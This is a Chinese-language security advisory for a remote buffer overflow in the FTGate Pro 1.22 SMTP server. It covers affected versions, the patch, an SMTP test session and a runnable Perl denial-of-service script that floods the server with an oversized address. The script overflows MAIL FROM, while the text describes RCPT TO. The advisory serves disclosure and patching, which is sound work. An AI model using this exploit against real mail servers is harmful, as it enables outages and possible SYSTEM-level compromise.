安全研究

安全漏洞
Floosietek FTGate PRO SMTP RCPT TO远程缓冲区溢出漏洞

发布日期:2003-05-06
更新日期:2003-05-12

受影响系统:
Floosietek FTGatePro 1.22 (1328)
不受影响系统:
Floosietek FTGatePro 1.22 (1330)
描述:
BUGTRAQ  ID: 7508

FTGatePro是一款网络共享代理服务程序,支持多种协议。

FTGatePro邮件服务程序对超长SMTP 'RCPT TO'命令参数缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出攻击,可能以SYSTEM用户权限在系统上执行任意指令。

当恶意攻击攻击者发送"RCPT TO"字段中包含超长字符串的邮件给FTGatePro邮件服务程序时,会发生缓冲区溢出,如果精心构建提交字符串,可能以SYSTEM权限在系统上执行任意指令。

<*来源:Dennis Rand (DER@cowi.dk
  
  链接:http://www.infowarfare.dk/Advisories/iw-16-advisory.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Dennis Rand (DER@cowi.dk)提供了如下测试方法:

220 win2k-serv ESMTP Server FTGate
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[BUFFER about 2000 Bytes @ and 2000 bytes again ending with ".com"]
<connection closed>

#!/usr/bin/perl -w
##################
# FTGate Pro Mail Server v. 1.22 (1328) DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP Server FTGate, causing the service to stop responding for a short
# Period, where we can actually overwrite the exception handler on the stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Solution:
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later
#
#

use IO::Socket;
    
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "a" x 2400;


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);

建议:
厂商补丁:

Floosietek
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载安装HOTFIX 1330补丁,升级到FTGate Pro Mail Server v. 1.22:

http://www.ftgate.com/

浏览次数:3665
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障